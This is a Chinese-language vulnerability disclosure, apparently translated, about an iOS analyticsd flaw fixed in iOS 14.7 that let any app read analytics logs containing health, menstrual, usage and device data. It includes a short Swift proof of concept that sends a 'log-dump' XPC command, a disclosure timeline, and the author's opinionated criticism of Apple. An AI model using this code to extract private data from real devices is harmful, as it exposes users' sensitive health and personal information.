Jailbreak #004：允许任何应用程序访问分析日志的 Analyticsd 漏洞

报告人：illusionofchaos

已修复版本：iOS 14.7

这个漏洞允许任何用户安装的应用程序访问分析日志（例如您可以在Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day... and Analytics-Daily... 看到的那些日志）。这些日志包含以下信息（包括但不限于）：

• 医疗信息（心率、检测到的房颤和心律不齐事件的计数）

• 月经周期长度、生理性别和年龄、宫颈粘液质量等。

• 设备使用信息（不同上下文中的设备拾取、推送通知计数和用户操作等）

• 具有各自 bundle ID 的所有应用程序的屏幕时间信息和会话计数

• 有关设备配件及其制造商、型号、固件版本和用户指定名称的信息

• 应用程序因 bundle ID 和异常代码而崩溃

• 用户在 Safari 中查看的网页语言

Apple 正在出于未知目的收集所有这些信息，这非常令人不安，尤其是正在收集医疗信息这一事实。这就是为什么苹果声称他们非常关心隐私是非常虚伪的。即使在设置中关闭了“共享分析”，所有这些数据也会被收集并可供攻击者使用。

func analytics_json() -> String? {
    let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_string(xdict, "command", "log-dump");
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
    return xpc_dictionary_get_string(reply, "log-dump");
}

时间线：

2021 年 4 月 29 日 - illusionofchaos向 Apple 报告了该漏洞

4 月 30 日 - Apple 承认了illusionofchaos的报告

5 月 20 日 - illusionofchaos已请求 Apple 更新状态（但未收到回复）

5 月 30 日 - illusionofchaos已向 Apple 请求状态更新

6 月 3 日 - Apple 回复说他们计划在即将到来的更新中解决这个问题

7 月 19 日 - iOS 14.7 与修复一起发布

7 月 20 日 - illusionofchaos已向 Apple 请求状态更新

7 月 21 日 - iOS 14.7 安全内容列表发布，未提及此漏洞

7 月 22 日 - illusionofchaos向 Apple 提出了一个问题，为什么该漏洞不在列表中 同一天 illusionofchaos 收到以下回复：由于处理问题，您的信用将包含在即将发布的更新中的安全公告中。官方对不便表示抱歉。

7 月 26 日 - iOS 14.7.1 安全内容列表发布，仍未提及此漏洞

9 月 13 日 - iOS 14.8 安全内容列表发布，仍然没有提及此漏洞。同一天，illusionofchaos 要求解释并通知 Apple，除非 illusionofchaos 很快收到回复，否则 illusionofchaos 将公开我所有的研究

9 月 20 日 - iOS 15.0 安全内容列表发布，仍未提及此漏洞